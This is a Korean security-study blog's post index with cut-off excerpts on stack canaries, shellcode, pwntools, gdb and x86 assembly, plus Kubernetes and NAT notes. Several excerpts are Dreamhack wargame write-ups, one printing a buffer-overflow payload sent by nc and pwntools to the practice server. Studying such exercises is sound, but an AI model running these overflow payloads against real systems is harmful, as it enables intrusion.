songining
article thumbnail
์นด๋‚˜๋ฆฌ ์šฐํšŒ๊ธฐ๋ฒ•
Hacking/System Hacking 2022. 4. 2. 18:05

checksec ./ํŒŒ์ผ์‹คํ–‰๋ช… # ํ•ด๋‹น ํŒŒ์ผ์— ์ ์šฉ๋œ ๋ณดํ˜ธ๊ธฐ๋ฒ•๋“ค์„ ๋ณด์—ฌ์ค€๋‹ค. pwntools ์„ค์น˜ํ•˜๋ฉด ์‹คํ–‰ ๊ฐ€๋Šฅ ์นด๋‚˜๋ฆฌ๊ฐ€ ์ ์šฉ๋˜์–ด ์žˆ๋Š” ๊ฒƒ์„ ํ™•์ธ #include #include int main() { char buf[0x50]; printf("Address of the buf: %p\n", buf); printf("Distance between buf and $rbp: %ld\n", (char*)__builtin_frame_address(0) - buf); //byte printf("[1] Leak the canary\n"); printf("Input: "); fflush(stdout); read(0, buf, 0x100); printf("Your input is '%s'\n", buf); puts("..

์Šคํƒ ์นด๋‚˜๋ฆฌ (Stack canary)
Hacking/System Hacking 2022. 4. 2. 17:56

์˜ค๋Š˜์€ ์Šคํƒ ์นด๋‚˜๋ฆฌ์— ๋Œ€ํ•ด ๊ณต๋ถ€๋ฅผ ํ•  ๊ฒƒ์ด๋‹ค! ์Šคํƒ์นด๋‚˜๋ฆฌ๋ž€? - ์Šคํƒ ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๋กœ๋ถ€ํ„ฐ ๋ฐ˜ํ™˜ ์ฃผ์†Œ๋ฅผ ๋ณดํ˜ธํ•˜๋Š” ๋ณดํ˜ธ๊ธฐ๋ฒ• - ์Šคํƒ ์นด๋‚˜๋ฆฌ๋Š” ํ•จ์ˆ˜์˜ ํ”„๋กค๋กœ๊ทธ์—์„œ ์Šคํƒ ๋ฒ„ํผ์™€ ๋ฐ˜ํ™˜ ์ฃผ์†Œ ์‚ฌ์ด์— ์ž„์˜์˜ ๊ฐ’์„ ์‚ฝ์ž…ํ•˜๊ณ , ํ•จ์ˆ˜์˜ ์—ํ•„๋กœ๊ทธ์—์„œ ํ•ด๋‹น ๊ฐ’์˜ ๋ณ€์กฐ๋ฅผ ํ™•์ธํ•˜๋Š” ๋ณดํ˜ธ ๊ธฐ๋ฒ•์ด๋‹ค. ์นด๋‚˜๋ฆฌ ๊ฐ’์˜ ๋ณ€์กฐ๊ฐ€ ํ™•์ธ๋˜๋ฉด ํ”„๋กœ์„ธ์Šค๋Š” ๊ฐ•์ œ๋กœ ์ข…๋ฃŒ๋œ๋‹ค!@! fs? -> TLS(Thread Local Storage)์— ์นด๋‚˜๋ฆฌ๋ฅผ ๋น„๋กฏํ•˜์—ฌ ํ”„๋กœ์„ธ์Šค ์‹คํ–‰์— ํ•„์š”ํ•œ ์—ฌ๋Ÿฌ ๋ฐ์ดํ„ฐ๊ฐ€ ์ €์žฅ๋œ๋‹ค๊ณ ๋งŒ ์ผ๋‹จ ์•Œ๊ณ  ์žˆ์ž Ex) ์˜ˆ๋ฅผ ๋“ค์–ด buf[8]์„ readํ•˜๋Š” ํ•จ์ˆ˜์— ๋Œ€ํ•ด ์Šคํƒ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ณต๊ฒฉ์„ ์ง„ํ–‰ํ•  ๊ฒฝ์šฐ rbp-8 ์— ์ €์žฅ๋œ ์นด๋‚˜๋ฆฌ์™€ fs:0x28 ์— ์ €์žฅ๋œ ์นด๋‚˜๋ฆฌ๋ฅผ xorํ•ด์„œ ์—ฐ์‚ฐ ๊ฒฐ๊ณผ๊ฐ€ 0์ด๋ฉด je ์„ฑ๊ณต์œผ๋กœ ์ •์ƒ ๋ฐ˜ํ™˜! ๊ฒฐ๊ณผ๊ฐ€ ๋‹ค๋ฅธ ๊ฒฝ..

[dreamhack] basic_exploitation_001 ๋ฌธ์ œํ’€์ด
Hacking/System Hacking 2022. 4. 2. 01:10

ํ”ผ๊ณคํ•œ๋ฐ ์—ด์‹ฌํžˆ ๋†€์•˜์œผ๋‹ˆ๊นŒ ์–‘์‹ฌ์ƒ ์ผ๋‹จ ํ•œ๋ฌธ์ œ ํ’€๊ณ ์ž๋ ค๊ตฌ,,, Ubuntu 16.04 Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) ํ™˜๊ฒฝ์€ ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค. #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } void read_flag() ..

article thumbnail
[dreamhack] basic_exploitation_000 ๋ฌธ์ œํ’€์ด
Hacking/System Hacking 2022. 4. 1. 11:45

pwnable ์ดˆ๋ณด์ธ ๋‚˜์—๊ฒŒ๋Š” ์–ด๋ ค์šด ๋ฌธ์ œ์˜€๋‹ค.. ์›๊ฒฉ ์„œ๋ฒ„ ํ™˜๊ฒฝ์€ ์ด๋Ÿฌํ•˜๋‹ค Ubuntu 16.04 Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments ์šฐ์„  32bit ํ™˜๊ฒฝ์ด๊ธฐ ๋•Œ๋ฌธ์— ์Šคํƒํ”„๋ ˆ์ž„๊ตฌ์กฐ๋Š” buf(n) | sfp(4) | ret(4) ์š”๋Ÿฌํ•˜๋‹ค. #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL..

article thumbnail
[dreamhack] Return Address Overwrite ํ’€์ด
Hacking/System Hacking 2022. 3. 31. 16:44

Host: host1.dreamhack.games Port: 10469/tcp 1. python ๊ณต๊ฒฉ ์ฝ”๋“œ ์ด์šฉ (python -c "print('A'*0x30 + 'B'*0x8 + '\xaa\x06\x40\x00\x00\x00\x00\x00')";cat)| nc host1.dreamhack.games 10469 2. pwntools ์ด์šฉ from pwn import * p = remote('host1.dreamhack.games',10469) # ์›๊ฒฉ ์„œ๋ฒ„ ๋Œ€์ƒ์œผ๋กœ ์ต์Šคํ”Œ๋กœ์ž‡ ์ˆ˜ํ–‰ context.arch="amd64" # x86-64 payload = 'A' * 0x30 payload += 'B' * 0x08 payload += '\xaa\x06\x40\x00\x00\x00\x00\x00' # get_..

article thumbnail
์Šคํƒ ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ( Stack buffer Overflow )
Hacking/System Hacking 2022. 3. 31. 01:39

์Šคํƒ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ VS ์Šคํƒ ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์Šคํƒ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ : ์Šคํƒ์˜์—ญ์ด ๋„ˆ๋ฌด ๋งŽ์ด ํ™•์žฅ๋ผ์„œ ๋ฐœ์ƒํ•˜๋Š” ๋ฒ„๊ทธ ์Šคํƒ ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ : ์Šคํƒ์— ์œ„์น˜ํ•œ ๋ฒ„ํผ์— ๋ฒ„ํผ์˜ ํฌ๊ธฐ๋ณด๋‹ค ๋งŽ์€ ๋ฐ์ดํ„ฐ๊ฐ€ ์ž…๋ ฅ๋˜์–ด ๋ฐœ์ƒํ•˜๋Š” ๋ฒ„๊ทธ (์Šคํƒ์˜ ๋ฒ„ํผ์—์„œ ๋ฐœ์ƒํ•˜๋Š” ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ) ๋ฒ„ํผ(buffer)๋ž€? ๋ฐ์ดํ„ฐ๊ฐ€ ๋ชฉ์ ์ง€๋กœ ์ด๋™๋˜๊ธฐ ์ „์— ๋ณด๊ด€๋˜๋Š” ์ž„์‹œ ์ €์žฅ์†Œ ์Šคํƒ ๋ฒ„ํผ : ์Šคํƒ์— ์žˆ๋Š” ์ง€์—ญ๋ณ€์ˆ˜ ํž™ ๋ฒ„ํผ : ํž™์— ํ• ๋‹น๋œ ๋ฉ”๋ชจ๋ฆฌ ์˜์—ญ Ex1) ๋ฐ์ดํ„ฐ ๋ณ€์กฐ - ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๋กœ ์ธํ•ด ๋’ค์˜ ๋ฐ์ดํ„ฐ ๊ฐ’์„ ๋ณ€์กฐ์‹œํ‚ฌ ์ˆ˜ ์žˆ๋‹ค. Ex2) ๋ฐ์ดํ„ฐ ์œ ์ถœ c์–ธ์–ด์—์„œ ๋ฌธ์ž์—ด์˜ ๋์„ null๋กœ ์ธ์‹ํ•˜๋Š”๋ฐ ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๋ฅผ ํ†ตํ•ด null์„ ์—†์• ์ฃผ๋ฉด ๋’ค์˜ ๋ฐ์ดํ„ฐ๊นŒ์ง€ ํ•จ๊ป˜ ์ฝ๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅํ•ด์ง„๋‹ค. Ex3) ์‹คํ–‰ํ๋ฆ„์กฐ์ž‘ ์˜ˆ๋ฅผ ๋“ค๋ฉด ํ•จ์ˆ˜์˜ ret์— ์ž์‹ ์ด ์‹คํ–‰ํ•˜๊ณ  ์‹ถ์€ ๋ช…๋ น..

Shellcode ๋ž€?
Hacking/System Hacking 2022. 3. 30. 01:54

์…ธ์ฝ”๋“œ๋ž€? -> ์ต์Šคํ”Œ๋กœ์ž‡์„ ์œ„ํ•ด ์ œ์ž‘๋œ ์–ด์…ˆ๋ธ”๋ฆฌ ์ฝ”๋“œ ์กฐ๊ฐ ์ผ๋ฐ˜์ ์œผ๋กœ ์…ธ์„ ํš๋“ํ•˜๋Š” ๊ฒƒ์ด ๋ชฉ์ ! ์–ด์…ˆ๋ธ”๋ฆฌ์–ด๋กœ ์ด๋ฃจ์–ด์ ธ์žˆ์Œ Ex) ํ•ด์ปค๊ฐ€ rip๋ฅผ ์ž์‹ ์ด ์ž‘์„ฑํ•œ ์…ธ์ฝ”๋“œ๋กœ ์˜ฎ๊ธฐ๋ฉด ํ•ด์ปค๊ฐ€ ์›ํ•˜๋Š” ์–ด์…ˆ๋ธ”๋ฆฌ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Œ orw ์…ธ์ฝ”๋“œ ์ž‘์„ฑ - ํŒŒ์ผ์„ ์—ด๊ณ  ์ฝ์€ ๋’ค ํ™”๋ฉด์— ์ถœ๋ ฅํ•ด์ฃผ๋Š” ์…ธ์ฝ”๋“œ! /** * /tmp/flag๋ฅผ ์ฝ๋Š” ์…ธ์ฝ”๋“œ */ char buf[0x30]; int fd = open("/tmp/flag", RD_ONLY, NULL); read(fd, buf, 0x30); // ํŒŒ์ผ ์ฝ๊ณ  buf์— ์ €์žฅ write(1, buf, 0x30); // buf ์— ์žˆ๋Š” ๊ฐ’ write ์œ„๋Š” ์šฐ๋ฆฌ๊ฐ€ ๋งŒ๋“ค ์…ธ ์ฝ”๋“œ์˜ c์–ธ์–ด ์˜์‚ฌ์ฝ”๋“œ 1. int fd = open(“/tmp/flag”, O_RDONLY, NUL..

pwntools ์‚ฌ์šฉ๋ฒ•
Hacking/System Hacking 2022. 3. 28. 22:52

1. process & remote - process : ์ต์Šคํ”Œ๋กœ์ž‡์„ ๋กœ์ปฌ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ๋Œ€์ƒ์œผ๋กœ ํ•  ๋•Œ ์‚ฌ์šฉํ•˜๋Š” ํ•จ์ˆ˜ (ํ…Œ์ŠคํŠธ & ๋””๋ฒ„๊น… ์šฉ) - remote : ์›๊ฒฉ ์„œ๋ฒ„๋ฅผ ๋Œ€์ƒ์œผ๋กœ ํ•  ๋•Œ ์‚ฌ์šฉ (์„œ๋ฒ„๋ฅผ ์‹ค์ œ ๊ณต๊ฒฉํ•˜๊ธฐ ์œ„ํ•จ) from pwn import * p = process('./test') #๋กœ์ปฌ ๋ฐ”์ด๋„ˆ๋ฆฌ 'test'๋ฅผ ๋Œ€์ƒ์œผ๋กœ ์ต์Šคํ”Œ๋กœ์ž‡ ์ˆ˜ํ–‰ p = remote('example.com',31337) #'example.com'์˜ 31337 ํฌํŠธ์—์„œ ์‹คํ–‰ ์ค‘์ธ ํ”„๋กœ์„ธ์Šค๋ฅผ ๋Œ€์ƒ์œผ๋กœ ์ต์Šคํ”Œ๋กœ์ž‡ ์ˆ˜ํ–‰ 2. send - send : ๋ฐ์ดํ„ฐ๋ฅผ ํ”„๋กœ์„ธ์Šค์— ์ „์†กํ•˜๊ธฐ์œ„ํ•ด ์‚ฌ์šฉ from pwn import * p = process('./test') p.send('A') # ./test์— 'A'๋ฅผ ์ž…๋ ฅ p.sendli..

article thumbnail
gdb ์‚ฌ์šฉ๋ฒ• ์ตํžˆ๊ธฐ
Hacking/System Hacking 2022. 3. 28. 20:49

gdb๋Š” ๋ฆฌ๋ˆ…์Šค์˜ ๋Œ€ํ‘œ์ ์ธ ๋””๋ฒ„๊ฑฐ์ค‘ ํ•˜๋‚˜! ELF - ๋ฆฌ๋ˆ…์Šค ์‹คํ–‰ ํŒŒ์ผ ํ˜•์‹ - ํฌ๊ฒŒ ํ—ค๋”์™€ ์—ฌ๋Ÿฌ ํ˜•์‹์œผ๋กœ ์ด๋ฃจ์–ด์ง --> ELF ์˜ ํ—ค๋”์— ์ง„์ž…์ (EP) ํ•„๋“œ ์กด์žฌ (OS๋Š” ELF๋ฅผ ์‹คํ–‰ํ•  ๋•Œ EP๋ถ€ํ„ฐ ํ”„๋กœ๊ทธ๋žจ ์‹คํ–‰) //ํ•ด๋‹น ๋ช…๋ น์–ด๋ฅผ ํ†ตํ•ด ์ง„์ž…์  ํ™•์ธ ๊ฐ€๋Šฅ //entry point address readelf -h debugee(ํŒŒ์ผ๋ช…) entry point address : 0x1060 gdb์—์„œ start ๋ช…๋ น์–ด๋ฅผ ์ž…๋ ฅํ•˜๋ฉด ์ง„์ž…์  ์ฃผ์†Œ๋ฅผ rip๊ฐ€ ๊ฐ€๋ฆฌํ‚ค๊ณ  ์žˆ๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค. gdb (gdb) start 1. registers : ๋ ˆ์ง€์Šคํ„ฐ์˜ ์ƒํƒœ๋ฅผ ๋ณด์—ฌ์คŒ 2. disasm : rip๋ถ€ํ„ฐ ์—ฌ๋Ÿฌ์ค„์— ๊ฑธ์ณ ๋””์Šค์–ด์…ˆ๋ธ”(๊ธฐ๊ณ„์–ด -> ์–ด์…ˆ๋ธ”๋ฆฌ)๋œ ๊ฒฐ๊ณผ๋ฅผ ๋ณด์—ฌ์คŒ 3. stack : rsp๋ถ€ํ„ฐ ์—ฌ๋Ÿฌ์ค„์— ๊ฑธ์ณ..

X86 ์–ด์…ˆ๋ธ”๋ฆฌ ์ •๋ฆฌ
Hacking/System Hacking 2022. 3. 27. 14:00

dreamhack์„ ํ†ตํ•ด ๊ณต๋ถ€ํ•œ ๋‚ด์šฉ์„ ์ •๋ฆฌํ•œ ํฌ์ŠคํŠธ์ž…๋‹ˆ๋‹ค. ํ”ผ์—ฐ์‚ฐ์ž ์ข…๋ฅ˜ - ์ƒ์ˆ˜ - ๋ ˆ์ง€์Šคํ„ฐ - ๋ฉ”๋ชจ๋ฆฌ (BYTE(1), WORD(2), DWORD(4), QWORD(8)) ๋ฐ์ดํ„ฐ์˜ ์ด๋™ - MOV a, b => b์— ์žˆ๋Š” ๊ฐ’์„ a์— ๋Œ€์ž… - LEA a,b => b์˜ ์ฃผ์†Œ๊ฐ’์„ a์— ๋Œ€์ž… EX) mov eax, dword ptr ss:[ebp-4] ์˜ ๊ฒฝ์šฐ์—๋Š” [ebp-4]๊ฐ€ ํ•˜๋‚˜์˜ ์ฃผ์†Œ๋กœ ํ•ด๋‹น ์ฃผ์†Œ์˜ ๊ฐ’์„ eax์— ๋Œ€์ž…ํ•œ๋‹ค. lea eax, dword ptr ss:[ebp-4] ์˜ ๊ฒฝ์šฐ์—๋Š” mov eax, ebp ํ›„์— sub eax,4 ๋ฅผ ํ•˜๋Š” ๊ฒƒ๊ณผ ๊ฐ™๋‹ค. +) [ ] ๊ธฐํ˜ธ๋Š” ์ฃผ์†Œ์˜ ์ฐธ์กฐ๊ฐ’์„ ์˜๋ฏธํ•˜๋ฉฐ [ ] ์•ˆ์—์„œ ์ฃผ์†Œ์˜ ์‚ฌ์น™ ์—ฐ์‚ฐ์ด ์ด๋ฃจ์–ด์ง„๋‹ค. ์‚ฐ์ˆ ์—ฐ์‚ฐ - add a,b => a= a+b - sub..

Kubernetes port ์ข…๋ฅ˜ ์ •๋ฆฌ
CLOUD/Kubernetes 2022. 3. 24. 16:28

NodePort : ์™ธ๋ถ€์—์„œ ์ ‘์†ํ•˜๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉํ•˜๋Š” port Port : Cluster ๋‚ด๋ถ€์—์„œ ์‚ฌ์šฉํ•  Service ๊ฐ์ฒด์˜ ํฌํŠธ TargetPort : Service๊ฐ์ฒด๋กœ ์ „๋‹ฌ๋œ ์š”์ฒญ์„ Pod(deployment)๋กœ ์ „๋‹ฌํ• ๋•Œ ์‚ฌ์šฉํ•˜๋Š” ํฌํŠธ(์ฆ‰ pod์˜ port?์ธ๋“ฏ) ์ฆ‰, HTTP -> NodePort -> Port -> TargetPort ์™ธ๋ถ€์—์„œ ์ ‘๊ทผํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” external ip:port ๋ฅผ ์ž…๋ ฅํ•ด์•ผํ•จ +) service - Cluster ip - NodePort - LoadBalancer ๋ธŒ๋ผ์šฐ์ €๊ฐ€ LoadBalancer์— ์š”์ฒญ ๋ณด๋‚ด๋ฉด ์•Œ์•„์„œ ์‚ด์•„์žˆ๋Š” Node ์— ์ ‘๊ทผ?? ํ•˜๋Š”๋“ฏ [์ถœ์ฒ˜] https://m.blog.naver.com/PostView.naver?isHttpsRedirect=tr..

article thumbnail
NAT(Network Address Translation) ๋ž€?
Network 2022. 3. 22. 21:12

** ๊ฐ€์ƒ๋จธ์‹  ๊ณต๋ถ€๋ฅผ ์œ„ํ•œ ํฌ์ŠคํŠธ ! NAT - ์‚ฌ์„ค ๋„คํŠธ์›Œํฌ ์ฃผ์†Œ(Ex) ๊ฐ€์ƒ๋จธ์‹  ๋‚ด๋ถ€ ๋„คํŠธ์›Œํฌ)๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๋ง์—์„œ ์™ธ๋ถ€ ๊ณต์ธ ๋„คํŠธ์›Œํฌ์™€์˜ ํ†ต์‹ ์„ ์œ„ํ•ด์„œ ๋„คํŠธ์›Œํฌ ์ฃผ์†Œ๋ฅผ ๋ณ€ํ™˜ํ•˜๋Š” ๊ฒƒ - ๊ฐ€์ƒ๋จธ์‹  ๋„คํŠธ์›Œํฌ์—์„œ ์ผ๋ฐ˜์ ์œผ๋กœ ์„ค์ •๋˜์–ด์žˆ์Œ - ๋„์ปค ์ปจํ…Œ์ด๋„ˆ๋„ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ๊ธฐ๋ณธ์ ์œผ๋กœ NAT ํ™˜๊ฒฝ ๊ตฌ์„ฑ - ๋‚ด๋ถ€ -> ์™ธ๋ถ€ ์ ‘๊ทผ ๊ฐ€๋Šฅ O - ์™ธ๋ถ€ -> ๋‚ด๋ถ€ ์ ‘๊ทผ ๋ถˆ๊ฐ€ X - ๋””ํดํŠธ ๊ฒŒ์ดํŠธ์›จ์ด๋ฅผ ํ†ตํ•ด ์™ธ๋ถ€์™€ ํ†ต์‹ ์ด ๊ฐ€๋Šฅ! - ๊ณต์œ ๊ธฐ๋„ ๋งˆ์ฐฌ๊ฐ€์ง€(๋‚ด๋ถ€์ ์œผ๋กœ ์‚ฌ์„ค ip๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์ง€๋งŒ ๊ธฐ๋ณธ ๊ฒŒ์ดํŠธ์›จ์ด์—์„œ ๊ณต์ธ ip๋กœ ๋ณ€๊ฒฝ๋œ ํ›„ ์›น์„œ๋ฒ„์— ์ „์†ก๋จ) ์ถœ์ฒ˜: https://technote.kr/213